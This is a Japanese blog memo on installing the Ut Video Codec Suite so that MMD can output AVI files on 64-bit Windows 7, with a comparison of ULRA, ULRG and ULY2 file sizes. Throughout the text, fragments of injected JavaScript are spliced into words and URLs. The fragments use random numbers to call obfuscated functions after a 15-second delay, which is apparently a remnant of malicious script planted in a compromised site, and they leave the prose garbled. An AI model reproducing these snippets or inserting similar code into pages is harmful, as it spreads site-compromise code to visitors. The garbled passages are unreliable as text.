MMD:AVI出力するエンコードの導入(Windows7 64bit)について備忘録

Windows 7 の 64bitの環境にして、MMDでAIVファイル形式で出力しようとしたとき、いつも使用するエンコードがないことに気づき導入したときの備忘録的な内容です。

まず、私が好んで使うエンコードは、可逆圧縮式の「Ut Vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deo Codom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dec Suite」です。

配布サイトは下記のURLより。
或るプログラマの一生dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://umezawa.dyndns.info/wordpress/

ちなみに、ブログを書いているときは、「[UtVidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deo] バージョン 9.0.1」というタイトルに最新がありました。

インストーラは、
x86
x64
の2種類が用意されています。

そして、私は、64bit OSだからとx64を選んでインストールしました。
けれど、MMDでAVI出力しようとしてもエンコードがでません。

もしかして、x86で32bitのじゃないとだめだったのかな?
と思って、x86をインストール。

すると、下記のようにエンコードが正常に表示されました。
要するに、MMDは32bitアプリケーションなので、エンコードも32bitをいれないとダメってことなのかな?
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

選択できるエンコードの種類は以下の4種類が用意されます。
 ULRA:RGBA 4:4:4:4 8bit フルレンジ
 ULRG:RGB 4:4:4 8bit フルレンジ
 ULY2:YCbCr 4:2:2 8bit リミテッド
 ULY0:YCbCr 4:2:0 8bit リミテッド

ULY0は使用することがないので、上3つでファイルサイズを比較

ULRA:1.08GB
ULRG:0.97GB
ULY2:0.62GB

RGBAはアルファチャンネルも出力されてくれるのでその分、サイズも大きくなるのでしょう。
動画編集でレイヤー使って編集とかしないので、ULY2をもっぱら使用しています。

それに、ULRGやULRAだと、ちゃんと出力できたか確認しようにも、私の環境だとそのままだと重すぎてまともに再生されません。
そもそも、違いがよくわかってなくてブログをかくにあたって調べたら、ULRAでアルファチャンネルが出力されると初めて知りました。

今後は、ULRAでの出力も考えてみようと思います。
ULY2よりは、ULRGとかのほうがきれいなのだろうか。見比べても違いがよくわかりませんでした。


1つのコメントがあります : MMD:AVI出力するエンコードの導入(Windows7 64bit)について備忘録

コメントを残す